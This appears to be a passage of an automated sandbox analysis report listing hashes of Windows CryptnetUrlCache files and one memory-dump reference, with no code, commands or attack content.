SHA256 caab9e5d39069eec471855ab39ff0a655f7328a46dce5e48b0ddad93a1169cd0
SHA512 86fdff68aa7ecda6428bc37f85f4319fd28689881628fa42e8fe1af3b51fe6880f16320d9054c7182afe196a031a721f233e77ff270e8972caa98c915cf1606a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3c0d6c7b3adfa3f3d8a6a96d5569c0b6
SHA1 5b7d338acb8444db8d60460a98430b3eb2d74871
SHA256 4ec6a12ca3ed5b81276724974c1e98a4962fc9a0f22522d1133a82e136ff8020
SHA512 0971a178fc3c0336fdf9ad1dc55cd6ef8233078a2f61c094f69019163635d9b5ce10bd0fd339858cc395661f42db716a37181e4a21dee0e424b50aca7f40fc1d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ad443acde060ab1a1238cb82766dc300
SHA1 f5d2284bb7ca93f38a827606592a4fc2f4650cff
SHA256 a8081a72eb7dab7eb2daa270211614b5a5fb7013b2a667804cf6f43b7b925a86
SHA512 28bc0a1a4638ecf37436bee260e7b48b8accf437dfe47a38b728da0c4c4abb46d05ec24f076fa730b3a9fcc4920aca99e683f7c45ca70da62063cdc5117f2393

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 d7a9ea27ca1c01b7a92aa446b93510c7
SHA1 5afdcb45bd5ed2228f35fb659373de8fb207aefc
SHA256 a660b13139d7e458b7033054ab04aa0030a51ac405b448a455787e36f86a38aa
SHA512 b84f9cbf0e6afd64797f289fb6d846d9a92dcd12f0f477c940e347e5220b9466535f78824010d5cda9e2a8a4b6621d1cd19553973e1842fefa2971094e3eeb46

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 e4a68ac854ac5242460afd72481b2a44
SHA1 df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256 cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA512 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 75ba1a9531c1dc5eb48264657c726fb4
SHA1 bb7919dd5da463636cc463107105e38cc42105ec
SHA256 c8eb1841aa40eeeb6721f256e16f12e809d72f23946f632fc5bd9994681bfd1c
SHA512 d2b3b3f5dd6746294e40d000cd979931bb35956a1ce2973c64c5d330a2bd29553203cc7a715e027140abdcb8c2a769a1bc9573b5ba853b27bc1d5dc0086b8bf2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3a02ed9061469b2bbf59dd574e234b7f
SHA1 12fb2ae7f2ad90effb6faf88b5361248e458c91e
SHA256 2d0e6e6c260f688363edf3fb5c579d25eb1641aab69713647e518186daef0480
SHA512 e48b6cfa786afc7a320871f87f02886cbcf59ed98e92288f6f1092a041ce8db78a267d64c9ba6373116d6f0808a4fb1f20700ddd7a1510fccd6f89fcc440e1ea

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9d3aeda873ddb7aa9bac38077365fdde
SHA1 71584b74b6fc809dfc561da4912f87320e9e7a37
SHA256 e57c7b8d27adbf2d1e909b4b50705a7fd3c425ea4ed60a0842ccd20a65829073
SHA512 b2b9e01b4ed2baa4e0f863a50ec269dd9eb713b21afc079d7d0658feba4091937cfbdbe0108857bc4938861663519f0e945551dad74bedb43d9d25abe69f34b1

memory/692-778-0x000000013F3A0000-0x000000013F3A6000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 40f0bdae7c15f8265c8483a8e86b6a53
SHA1 e6c0f2b36bba39022f479e53fa553b6b65dd1457
SHA256 442a8e6a9dcd5187542f3e3305aff6af68c5c7e5fdc44159e632aaafc53aa945
SHA512 10c45af49a2786e61cee8983b3c2e21f09c05cd7932cdbce6d32cf69158e268b7958209435d3e6d34c4b559da4d7fa352846f6b4cad48f145d9df39ab5235a4a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 52fb5a2496b66b6fa9f08f70675c5ace
SHA1 9bd89b9d7d09a2f6f45f4fe8b496283c3c81d59c
SHA256 2dd68a16d3e92c626682aaa2d1b76b8c5950ac532ced1011cb2d3594af7ad5ad
SHA512 5e6137157f234caa82d3e3df73a2c1fcf40cf6371e1e4a67f6b5822a1a48ba9780225a43668961be7bd379b94dfcd2161b8ef9d7dcecad22f50f224807b50961

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a805c8fc9ffe0e0529b3727e6e473b06
SHA1 5f571e6923283310b7508a0ea462027cfbf1da1f
SHA256 d4a67ea79d767efb67d45dd8569897e39c7c1eb51ffc4352dc3a6fee1849df80
SHA512 1d9fb75d8b9c684ac7b718bf2b790c1e5b6aba63e734a5b7878b63d79559084d5d6353769a61bc18e90a2fc83bddb2082d0b8f4d0496a1b50442f2ad963eb8e4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7963f098763d48e797add104eef7038b
SHA1 cefe6adea2c4a324c0f96f2db369f16d9d78a0f9
SHA256 7e7d740f36d2a33192e4eb33e38207ed3f307599399c9b7010a71d1582e5a932
SHA512 5062989676ac17d490b4e3ff8bd005bebaea4968642f683f5abf38501c9a7908ec4bb91b6d553f02b743c6f5d29b8535aa1a58e61654542a9b829985e0e6e48e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8609a36f422f530aee8e51d163c8df63
SHA1 a929b762f9b893a8fc55cb40916e22b63e236c3f
SHA256 498cfe2071271c1bb3bb717f4cdc9a0a7a3911baca64f4bd06debcc5d20c8b7b
SHA512 9824ad6292b09c11f3acb483d1abf253a9ec069d7e328c61cf87271dbfd867e5f7d674fceadd46e9462c992361c2d2251689e164e4f1f0aed06269e55bcf61e4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 34085e3914f574aebead46fa6e5f1fd6
SHA1 4f1c6767d8531a907dcc9f6f6b3059a33c063872
SHA256 18ba57c5ff1bfa145716a52e7715818546f89026826e91771b27ea897e070133
SHA512 b71a6e30af92ae1a7f26af90bb96db15e24b996842bdb3f8877d5a5d527529d10abc35a4d4ddc40ea9183bd60fd45a14a0ed0d53627bfb3de0c36f75425e6ed5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7b6ead6881cd1beaa749b8afbc40f7b4
SHA1 105881d84093bad34fd1d49ebbcffffb782ed725
SHA256 8deac1a9c56f84999ea70ecb5a81b644114292bc0539191825f776241accc1b8
SHA512 1c9288e6da30870f732e2f84c7c4d3d9f5c6fbb573e305109b9d683baff7a9a23fda5f583d9fea4d93542065ff6d66d3d11c4e7ffb7ad05d92a1b9065db79098

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c4519739a0e15209c0e9bcc147823ef4
SHA1 ab56e2f69327a7a775945f1d33f556be4e2ef0cb
SHA256 073c0f527f2b63fb93bd54efaae93969b227c6dc203436f42d74707a1af4ac1e
SHA512 d3dcf4e94a5a71165f39e79d35e307f0e3aa2b9f60888fd11a63358505032ac981910e9f6bc5ccd8377c0bca4c9799d4afcdb59b3eb29adc5c8b9d3907c692c1